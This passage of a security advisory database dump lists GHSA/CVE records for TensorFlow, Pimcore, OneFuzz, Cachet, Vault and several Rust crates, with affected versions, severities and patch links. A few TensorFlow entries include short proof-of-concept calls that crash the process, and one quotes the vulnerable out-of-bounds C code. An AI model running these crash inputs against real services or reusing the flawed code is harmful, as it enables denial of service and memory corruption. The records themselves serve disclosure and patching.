+Problem is patched in 10.1.1 + +### Workarounds +Apply https://github.com/pimcore/pimcore/pull/9992.patch + +### References +https://cwe.mitre.org/data/definitions/1236.html +",[],"[{'package': {'ecosystem': 'Packagist', 'name': 'pimcore/pimcore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '10.1.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/security/advisories/GHSA-pp2h-95hm-hv9r'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37702'}, {'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/pull/9992'}, {'type': 'PACKAGE', 'url': 'https://github.com/pimcore/pimcore'}]","{'cwe_ids': ['CWE-1236'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-26T20:12:56Z', 'nvd_published_at': '2021-08-18T15:15:00Z'}" +1.4.0,GHSA-c545-c4f9-rf6v,2021-08-24T17:15:34Z,2021-08-25T14:40:09Z,,['CVE-2021-37685'],Heap OOB in TFLite,"### Impact +TFLite's [`expand_dims.cc`](https://github.com/tensorflow/tensorflow/blob/149562d49faa709ea80df1d99fc41d005b81082a/tensorflow/lite/kernels/expand_dims.cc#L36-L50) contains a vulnerability which allows reading one element outside of bounds of heap allocated data: + +```cc + if (axis < 0) { + axis = input_dims.size + 1 + axis; + } + TF_LITE_ENSURE(context, axis <= input_dims.size); + + TfLiteIntArray* output_dims = TfLiteIntArrayCreate(input_dims.size + 1); + for (int i = 0; i < output_dims->size; ++i) { + if (i < axis) { + output_dims->data[i] = input_dims.data[i]; + } else if (i == axis) { + output_dims->data[i] = 1; + } else { + output_dims->data[i] = input_dims.data[i - 1]; + } + } +``` + +If `axis` is a large negative value (e.g., `-100000`), then after the first `if` it would still be negative. The check following the `if` statement will pass and the `for` loop would read one element before the start of `input_dims.data` (when `i = 0`). + +### Patches +We have patched the issue in GitHub commit [d94ffe08a65400f898241c0374e9edc6fa8ed257](https://github.com/tensorflow/tensorflow/commit/d94ffe08a65400f898241c0374e9edc6fa8ed257). + +The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by Yakun Zhang of Baidu Security.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-c545-c4f9-rf6v'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37685'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/d94ffe08a65400f898241c0374e9edc6fa8ed257'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]","{'cwe_ids': ['CWE-125'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-24T17:15:34Z', 'nvd_published_at': '2021-08-12T23:15:00Z'}" +1.4.0,GHSA-v768-w7m9-2vmm,2021-08-24T15:44:08Z,2021-08-25T14:41:26Z,,['CVE-2021-37676'],Reference binding to nullptr in shape inference,"### Impact +An attacker can cause undefined behavior via binding a reference to null pointer in `tf.raw_ops.SparseFillEmptyRows`: + +```python +import tensorflow as tf + +tf.compat.v1.disable_v2_behavior() +tf.raw_ops.SparseFillEmptyRows( + indices = tf.constant([], shape=[0, 0], dtype=tf.int64), + values = tf.constant([], shape=[0], dtype=tf.int64), + dense_shape = tf.constant([], shape=[0], dtype=tf.int64), + default_value = 0) +``` + +The shape inference [implementation](https://github.com/tensorflow/tensorflow/blob/460e000de3a83278fb00b61a16d161b1964f15f4/tensorflow/core/ops/sparse_ops.cc#L608-L634) does not validate that the input arguments are not empty tensors. + +### Patches +We have patched the issue in GitHub commit [578e634b4f1c1c684d4b4294f9e5281b2133b3ed](https://github.com/tensorflow/tensorflow/commit/578e634b4f1c1c684d4b4294f9e5281b2133b3ed). + +The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by Yakun Zhang of Baidu Security","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-v768-w7m9-2vmm'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37676'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/578e634b4f1c1c684d4b4294f9e5281b2133b3ed'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]","{'cwe_ids': ['CWE-824'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-24T15:44:08Z', 'nvd_published_at': '2021-08-12T22:15:00Z'}" +1.4.0,GHSA-g7r5-x7cr-vm3v,2023-06-13T20:01:08Z,2021-08-25T20:58:29Z,,['CVE-2019-15548'],Buffer overflow and format vulnerabilities in ncurses,"ncurses exposes functions from the ncurses library which: +* Pass buffers without length to C functions that may write an arbitrary amount of data, leading to a buffer overflow. (instr, mvwinstr, etc) +* Passes rust &str to strings expecting C format arguments, allowing hostile input to execute a format string attack, which trivially allows writing arbitrary data to stack memory (functions in the printw family). +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'ncurses'}, 'ecosystem_specific': {'affected_functions': ['ncurses::instr', 'ncurses::mvprintw', 'ncurses::mvwinstr', 'ncurses::mvwprintw', 'ncurses::printw']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '5.101.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-15548'}, {'type': 'WEB', 'url': 'https://github.com/RustSec/advisory-db/issues/106'}, {'type': 'WEB', 'url': 'https://github.com/jeaye/ncurses-rs/issues/172'}, {'type': 'PACKAGE', 'url': 'https://github.com/jeaye/ncurses-rs'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2019-0006.html'}]","{'cwe_ids': ['CWE-119'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-18T17:45:15Z', 'nvd_published_at': None}" +1.4.0,GHSA-q5vh-6whw-x745,2021-08-26T21:15:35Z,2021-08-13T20:16:32Z,,['CVE-2021-37705'],Improper Authorization and Origin Validation Error in OneFuzz,"## Impact + +Starting with OneFuzz 2.12.0 or greater, an incomplete authorization check allows an authenticated user from any Azure Active Directory tenant to make authorized API calls to a vulnerable OneFuzz instance. + +To be vulnerable, a OneFuzz deployment must be: +* Version 2.12.0 or greater +* Deployed with the non-default [`--multi_tenant_domain`](https://github.com/microsoft/onefuzz/blob/2.30.0/src/deployment/deploy.py#L1021) option + +This can result in read/write access to private data such as: +* Software vulnerability and crash information +* Security testing tools +* Proprietary code and symbols + +Via authorized API calls, this also enables tampering with existing data and unauthorized code execution on Azure compute resources. + +## Patches + +This issue is resolved starting in release 2.31.0, via the addition of application-level check of the bearer token's `issuer` against an administrator-configured allowlist. + +## Workarounds + +Users can restrict access to the tenant of a deployed OneFuzz instance < 2.31.0 by redeploying in the default configuration, which omits the `--multi_tenant_domain` option. + +## References + +You can find an overview of the Microsoft Identity Platform [here](https://docs.microsoft.com/en-us/azure/active-directory/develop/v2-overview). This vulnerability applies to the multi-tenant application pattern, as described [here](https://docs.microsoft.com/en-us/azure/active-directory/develop/howto-convert-app-to-be-multi-tenant). + +## For more information +If you have any questions or comments about this advisory: +* Open an issue in [OneFuzz](https://github.com/microsoft/onefuzz) +* Email us at [fuzzing@microsoft.com](mailto:fuzzing@microsoft.com)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'onefuzz'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.12.0'}, {'fixed': '2.31.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/microsoft/onefuzz/security/advisories/GHSA-q5vh-6whw-x745'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37705'}, {'type': 'WEB', 'url': 'https://github.com/microsoft/onefuzz/pull/1153'}, {'type': 'WEB', 'url': 'https://github.com/microsoft/onefuzz/commit/2fcb4998887959b4fa11894a068d689189742cb1'}, {'type': 'PACKAGE', 'url': 'https://github.com/microsoft/onefuzz/'}, {'type': 'WEB', 'url': 'https://github.com/microsoft/onefuzz/releases/tag/2.31.0'}, {'type': 'WEB', 'url': 'https://pypi.org/project/onefuzz/'}]","{'cwe_ids': ['CWE-285', 'CWE-346', 'CWE-863'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-13T20:16:08Z', 'nvd_published_at': '2021-08-13T21:15:00Z'}" +1.4.0,GHSA-cm5x-837x-jf3c,2021-08-24T13:20:38Z,2021-08-25T14:42:44Z,,['CVE-2021-37660'],Division by 0 in inplace operations,"### Impact +An attacker can cause a floating point exception by calling inplace operations with crafted arguments that would result in a division by 0: + +```python +import tensorflow as tf + +tf.raw_ops.InplaceSub(x=[],i=[-99,-1,-1],v=[1,1,1]) +``` + +The [implementation](https://github.com/tensorflow/tensorflow/blob/84d053187cb80d975ef2b9684d4b61981bca0c41/tensorflow/core/kernels/inplace_ops.cc#L283) has a logic error: it should skip processing if `x` and `v` are empty but the code uses `||` instead of `&&`. + +### Patches +We have patched the issue in GitHub commit [e86605c0a336c088b638da02135ea6f9f6753618](https://github.com/tensorflow/tensorflow/commit/e86605c0a336c088b638da02135ea6f9f6753618). + +The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-cm5x-837x-jf3c'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37660'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/e86605c0a336c088b638da02135ea6f9f6753618'}]","{'cwe_ids': ['CWE-369'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-24T13:20:38Z', 'nvd_published_at': '2021-08-12T18:15:00Z'}" +1.4.0,GHSA-fhvc-gp6c-h2wx,2023-06-13T20:33:52Z,2021-08-25T20:52:23Z,,['CVE-2021-26953'],Read on uninitialized buffer in postscript,"Affected versions of this crate passes an uninitialized buffer to a user-provided Read implementation. + +Arbitrary Read implementations can read from the uninitialized buffer (memory exposure) and also can return incorrect number of bytes written to the buffer. Reading from uninitialized memory produces undefined values that can quickly invoke undefined behavior. + +This flaw was fixed in commit `8026286` by zero-initializing the buffer before handing to a user-provided Read.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'postscript'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.14.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-26953'}, {'type': 'WEB', 'url': 'https://github.com/bodoni/postscript/issues/1'}, {'type': 'WEB', 'url': 'https://github.com/bodoni/postscript/commit/8026286'}, {'type': 'PACKAGE', 'url': 'https://github.com/bodoni/postscript'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0017.html'}]","{'cwe_ids': ['CWE-908'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T17:35:31Z', 'nvd_published_at': None}" +1.4.0,GHSA-69fv-gw6g-8ccg,2023-06-13T16:50:04Z,2021-08-25T20:43:26Z,,['CVE-2018-20998'],Potential memory corruption in arrayfire,"The attribute repr() added to enums to be compatible with C-FFI caused memory corruption on MSVC toolchain. + +arrayfire crates <= version 3.5.0 do not have this issue when used with Rust versions 1.27 or earlier. The issue only started to appear since Rust version 1.28. + +The issue seems to be interlinked with which version of Rust is being used. + +The issue was fixed in crate 3.6.0.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'arrayfire'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.6.0'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'arrayfire'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.6.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2018-20998'}, {'type': 'WEB', 'url': 'https://github.com/arrayfire/arrayfire-rust/pull/177'}, {'type': 'PACKAGE', 'url': 'https://github.com/arrayfire/arrayfire-rust'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/arrayfire/PYSEC-2019-144.yaml'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2018-0011.html'}]","{'cwe_ids': ['CWE-119'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T21:24:28Z', 'nvd_published_at': '2019-08-26T18:15:00Z'}" +1.4.0,GHSA-2vx6-fcw6-hpr6,2021-08-19T20:50:20Z,2021-08-25T20:49:52Z,,['CVE-2020-35917'],Reference counting error in pyo3,An issue was discovered in the pyo3 crate before 0.12.4 for Rust. There is a reference-counting error and use-after-free in From>.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'pyo3'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.12.0'}, {'fixed': '0.12.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35917'}, {'type': 'WEB', 'url': 'https://github.com/PyO3/pyo3/pull/1297'}, {'type': 'WEB', 'url': 'https://github.com/PyO3/pyo3/commit/8f81f595dd770b586c7ca7195b42004a6c976eb9'}, {'type': 'PACKAGE', 'url': 'https://github.com/PyO3/pyo3'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0074.html'}]","{'cwe_ids': ['CWE-416'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T20:50:20Z', 'nvd_published_at': None}" +1.4.0,GHSA-fp52-qw33-mfmw,2023-08-29T22:39:27Z,2021-08-02T17:11:41Z,,['CVE-2020-16250'],Authentication Bypass by Spoofing and Insufficient Verification of Data Authenticity in Hashicorp Vault,"HashiCorp Vault and Vault Enterprise versions 0.7.1 and newer, when configured with the AWS IAM auth method, may be vulnerable to authentication bypass. Fixed in 1.2.5, 1.3.8, 1.4.4, and 1.5.1..","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/vault'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.8.1'}, {'fixed': '1.2.5'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/vault'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.3.0'}, {'fixed': '1.3.8'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/vault'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.4.0'}, {'fixed': '1.4.4'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/vault'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.5.0'}, {'fixed': '1.5.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-16250'}, {'type': 'PACKAGE', 'url': 'https://github.com/hashicorp/vault'}, {'type': 'WEB', 'url': 'https://github.com/hashicorp/vault/blob/master/CHANGELOG.md#151'}, {'type': 'WEB', 'url': 'https://www.hashicorp.com/blog/category/vault/'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/159478/Hashicorp-Vault-AWS-IAM-Integration-Authentication-Bypass.html'}]","{'cwe_ids': ['CWE-290', 'CWE-345'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-07-26T18:55:09Z', 'nvd_published_at': '2020-08-26T15:15:00Z'}" +1.4.0,GHSA-9jxw-cfrh-jxq6,2022-08-11T00:16:20Z,2021-08-30T16:11:24Z,,['CVE-2021-39172'],Cachet vulnerable to new line injection during configuration edition,"### Impact + +Authenticated users, regardless of their privileges (_User_ or _Admin_), can exploit a new line injection in the configuration edition feature (e.g. mail settings) and gain arbitrary code execution on the server. + +### Patches + +This issue was addressed by improving `UpdateConfigCommandHandler` and preventing the use of new lines characters in new configuration values. + +### Workarounds + +Only allow trusted source IP addresses to access to the administration dashboard. + +### References + +- https://blog.sonarsource.com/cachet-code-execution-via-laravel-configuration-injection + +### For more information + +If you have any questions or comments about this advisory, you can contact: +- The original reporters, by sending an email to vulnerability.research [at] sonarsource.com; +- The maintainers, by opening an issue on this repository. +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'cachethq/cachet'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.5.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/fiveai/Cachet/security/advisories/GHSA-9jxw-cfrh-jxq6'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-39172'}, {'type': 'WEB', 'url': 'https://github.com/fiveai/Cachet/commit/6442976c25930cb370c65a22784b9caee7ed1de2'}, {'type': 'WEB', 'url': 'https://blog.sonarsource.com/cachet-code-execution-via-laravel-configuration-injection/'}, {'type': 'PACKAGE', 'url': 'https://github.com/fiveai/Cachet'}, {'type': 'WEB', 'url': 'https://github.com/fiveai/Cachet/releases/tag/v2.5.1'}]","{'cwe_ids': ['CWE-93'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-27T23:35:16Z', 'nvd_published_at': '2021-08-27T23:15:00Z'}" +1.4.0,GHSA-qc4m-gc8r-mg8m,2021-08-19T20:56:12Z,2021-08-25T20:48:59Z,,['CVE-2020-35885'],Double free in alpm-rs,An issue was discovered in the alpm-rs crate through 2020-08-20 for Rust. StrcCtx performs improper memory deallocation.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'alpm-rs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.1.24'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35885'}, {'type': 'WEB', 'url': 'https://github.com/pigeonhands/rust-arch/issues/2'}, {'type': 'PACKAGE', 'url': 'https://github.com/BahNahNah/rust-arch/tree/master/alpm-rs'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0032.html'}]","{'cwe_ids': ['CWE-415'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T20:56:12Z', 'nvd_published_at': '2020-12-31T10:15:00Z'}" +1.4.0,GHSA-6c65-xcf5-299x,2021-08-18T17:52:08Z,2021-08-25T20:58:25Z,,['CVE-2019-16144'],Uninitialized memory use in generator,"An issue was discovered in the generator crate before 0.6.18 for Rust. Uninitialized memory is used by Scope, done, and yield_ during API calls.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'generator'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.6.18'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-16144'}, {'type': 'WEB', 'url': 'https://github.com/Xudong-Huang/generator-rs/issues/11'}, {'type': 'WEB', 'url': 'https://github.com/Xudong-Huang/generator-rs/issues/13'}, {'type': 'WEB', 'url': 'https://github.com/Xudong-Huang/generator-rs/issues/14'}, {'type': 'WEB', 'url': 'https://github.com/Xudong-Huang/generator-rs/issues/9'}, {'type': 'PACKAGE', 'url': 'https://github.com/Xudong-Huang/generator-rs'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2019-0020.html'}]","{'cwe_ids': ['CWE-908'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-18T17:52:08Z', 'nvd_published_at': '2019-09-09T12:15:00Z'}" +1.4.0,GHSA-jh37-772x-4hpw,2021-08-24T19:12:12Z,2021-08-25T21:01:52Z,,['CVE-2021-31996'],Double free in algorithmica,"An issue was discovered in the algorithmica crate through 2021-03-07 for Rust. In the affected versions of this crate, `merge_sort::merge()` wildly duplicates and drops ownership of `T` without guarding against double-free. Due to such implementation, simply invoking `merge_sort::merge()` on `Vec` can cause **double free** bugs. +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'algorithmica'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.1.8'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-31996'}, {'type': 'WEB', 'url': 'https://github.com/AbrarNitk/algorithmica/issues/1'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0053.html'}]","{'cwe_ids': ['CWE-415'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-25T20:52:19Z', 'nvd_published_at': None}" +1.4.0,GHSA-crv7-7245-f45f,2022-02-08T21:08:47Z,2021-08-02T16:55:15Z,,['CVE-2021-35516'],Improper Handling of Length Parameter Inconsistency in Compress,"When reading a specially crafted 7Z archive, Compress can be made to allocate large amounts of memory that finally leads to an out of memory error even for very small inputs. This could be used to mount a denial of service attack against services that use Compress' sevenz package.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.commons:commons-compress'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.21'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-35516'}, {'type': 'WEB', 'url': 'https://commons.apache.org/proper/commons-compress/security-reports.html'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r67ef3c07fe3b8c1b02d48012149d280ad6da8e4cec253b527520fb2b@%3Cdev.poi.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9f54c0caa462267e0cc68b49f141e91432b36b23348d18c65bd0d040@%3Cnotifications.skywalking.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/racd0c0381c8404f298b226cd9db2eaae965b14c9c568224aa3f437ae@%3Cnotifications.skywalking.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb064d705fdfa44b5dae4c366b369ef6597951083196321773b983e71@%3Ccommits.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb6e1fa80d34e5ada45f72655d84bfd90db0ca44ef19236a49198c88c@%3Cnotifications.skywalking.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb7adf3e55359819e77230b4586521e5c6874ce5ed93384bdc14d6aee@%3Cnotifications.skywalking.apache.org%3E'}, {'type': 'WEB', 